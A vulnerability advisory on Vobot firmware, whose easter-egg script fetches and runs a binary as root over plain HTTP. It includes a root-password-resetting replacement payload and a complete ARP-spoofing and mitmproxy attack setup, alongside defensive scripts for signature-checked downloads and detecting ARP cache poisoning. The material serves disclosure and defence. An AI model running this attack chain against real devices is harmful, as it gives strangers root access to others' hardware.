6. February 2018 - Thomas Roth - firstname.lastname@example.org
CVSS: 9.6 Critical
This vulnerability has been confirmed to be exploitable. The vulnerability will potentially be published after 60 days or after a patch for the vulnerability has been released.
It was found that the Vobot firmware has an easter egg that starts a Breakout video game, which can be invoked by pressing the volume-down button on the back of the device for ca. 3 seconds. The shell script that implements this easter egg (located in /usr/sbin/game_breakout) uses the wget utility to download the game from the URL http://file.myvobot.com/plugin/game/breakout to /tmp/breakout and executes it.
An attacker who conducts a man-in-the-middle attack can intercept the plain-HTTP request and supply their own binary, which is then executed with root permissions on the device.
The connection should at least use HTTPS (with certificate validation, see the CVE-2018-6827 vulnerability report). This solution will still pose an issue if the server (or the TLS connection) is compromised, as no additional validation of the binary is done (e.g. a signature verification). It is therefore recommended to perform additional, digital-signature-based verification of all downloaded executables and firmware upgrades.
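As an added illustration of the recommended fix (this is an example written for this page, not the Vobot script or any vendor code), the following POSIX shell flow fetches a binary over HTTPS only and executes it only after a detached RSA-SHA256 signature verifies against a public key shipped in the firmware. It assumes the openssl and wget command-line tools are available, a hypothetical key path /etc/vobot/release-signing.pub, and a hypothetical convention that the server publishes the signature at <url>.sig.

```shell
#!/bin/sh
# Added example: hardened download-then-execute flow for a firmware easter egg.
# Assumptions (not from the original report): openssl and wget CLIs exist, the
# vendor's release-signing public key is shipped read-only in the firmware at
# $VOBOT_PUBKEY (hypothetical path), and the server serves a detached signature
# next to the binary at "<url>.sig" (hypothetical convention).

set -u

VOBOT_PUBKEY="${VOBOT_PUBKEY:-/etc/vobot/release-signing.pub}"   # hypothetical path

# verify_download FILE SIG PUBKEY
# Returns 0 only if SIG is a valid RSA-SHA256 signature of FILE under PUBKEY.
# Any missing or empty input is treated as a verification failure.
verify_download() {
    file="$1"; sig="$2"; pubkey="$3"
    [ -s "$file" ] && [ -s "$sig" ] && [ -s "$pubkey" ] || return 1
    openssl dgst -sha256 -verify "$pubkey" -signature "$sig" "$file" >/dev/null 2>&1
}

# fetch_and_run URL
# Downloads the binary and its detached signature over HTTPS only (wget validates
# the server certificate by default; --https-only refuses plain HTTP, including
# redirects to it), verifies the signature, and only then executes the file.
# The download lands in a private temp directory so an unverified file is never
# left at a predictable, executable location such as /tmp/breakout.
fetch_and_run() {
    url="$1"
    workdir="$(mktemp -d)" || return 1
    bin="$workdir/payload"; sig="$workdir/payload.sig"
    if ! wget --https-only -q -O "$bin" "$url" \
       || ! wget --https-only -q -O "$sig" "$url.sig"; then
        rm -rf "$workdir"; return 1
    fi
    if ! verify_download "$bin" "$sig" "$VOBOT_PUBKEY"; then
        rm -rf "$workdir"; return 1
    fi
    chmod 0700 "$bin" && "$bin"
    status=$?
    rm -rf "$workdir"
    return "$status"
}
```

The key point is the order of operations: the file is executed only after verify_download succeeds, so a substituted body (whether from a network interposer or a compromised server) fails verification and is discarded. The signing key itself must never be on the device or the update server; only the public half ships in the firmware.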
An attacker on the same network can conduct a man-in-the-middle attack using ARP spoofing. By then using a transparent proxy such as mitmproxy, it is possible to intercept and modify all requests between the Vobot client and the different servers. The attacker can then replace the response to the HTTP request for http://file.myvobot.com/plugin/game/breakout with a custom response, such as:
#!/bin/sh
passwd << EOF
test1234
test1234
EOF
This will set the root password of the device to test1234, which can then be used by a network-local attacker to connect to the device via SSH (which is enabled by default, see CVE-2018-6826).
Example attack setup:
export VOBOT_IP=...    # e.g. 192.168.0.5
export GATEWAY_IP=...  # e.g. 192.168.0.1
export INTERFACE=...   # e.g. wlan0

sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i "$INTERFACE" -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i "$INTERFACE" -p tcp --dport 443 -j REDIRECT --to-port 8080

# In separate terminals:
arpspoof -i $INTERFACE -t $VOBOT_IP $GATEWAY_IP >/dev/null &
arpspoof -i $INTERFACE -t $GATEWAY_IP $VOBOT_IP >/dev/null &
mitmproxy -T --host
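A network-side check a defender can run against the ARP-spoofing step above, added here as an example that is not part of the original report: it compares two snapshots of Linux ip neigh show output and flags any IP address whose MAC changed between them, which is exactly the effect the two arpspoof processes have on the victim's and the gateway's ARP caches. The sample snapshots in write_samples are constructed for this example.

```shell
#!/bin/sh
# Added example: flag IP-to-MAC changes between two ARP-cache snapshots.
# Input files hold "ip neigh show" output (Linux iproute2), for example:
#   192.168.0.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
# Entries without an lladdr field (FAILED / INCOMPLETE) are ignored.

# arp_mac_changes BEFORE AFTER
# Prints "ip old_mac -> new_mac" for every entry whose MAC differs between the
# two snapshots. Returns 1 if at least one entry changed, 0 otherwise.
arp_mac_changes() {
    awk '
        {
            ip = ""; mac = ""
            for (i = 1; i < NF; i++) if ($i == "lladdr") { ip = $1; mac = $(i + 1); break }
        }
        ip == "" { next }
        FILENAME == ARGV[1] { first[ip] = mac; next }
        (ip in first) && first[ip] != mac { print ip, first[ip], "->", mac; changed = 1 }
        END { exit changed ? 1 : 0 }
    ' "$1" "$2"
}

# write_samples DIR
# Constructed sample data (not captured from a real network): in the second
# snapshot the gateway 192.168.0.1 suddenly resolves to the MAC that another
# host on the LAN (192.168.0.7) already uses, the signature of a poisoned cache.
write_samples() {
    dir="$1"
    cat > "$dir/before.txt" <<'EOF'
192.168.0.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.0.7 dev wlan0 lladdr de:ad:be:ef:00:07 STALE
192.168.0.9 dev wlan0 FAILED
EOF
    cat > "$dir/after.txt" <<'EOF'
192.168.0.1 dev wlan0 lladdr de:ad:be:ef:00:07 REACHABLE
192.168.0.7 dev wlan0 lladdr de:ad:be:ef:00:07 STALE
192.168.0.9 dev wlan0 FAILED
EOF
}

# Usage on a live host: ip neigh show > before.txt; sleep 60; ip neigh show > after.txt
#                       arp_mac_changes before.txt after.txt && echo "no changes"
```

Running this periodically on a monitoring host (or alerting on the same condition from a switch's ARP inspection logs) gives early warning that a gateway MAC has moved; on the device side it does not replace the HTTPS and signature checks, which are what actually stop the substituted binary from running.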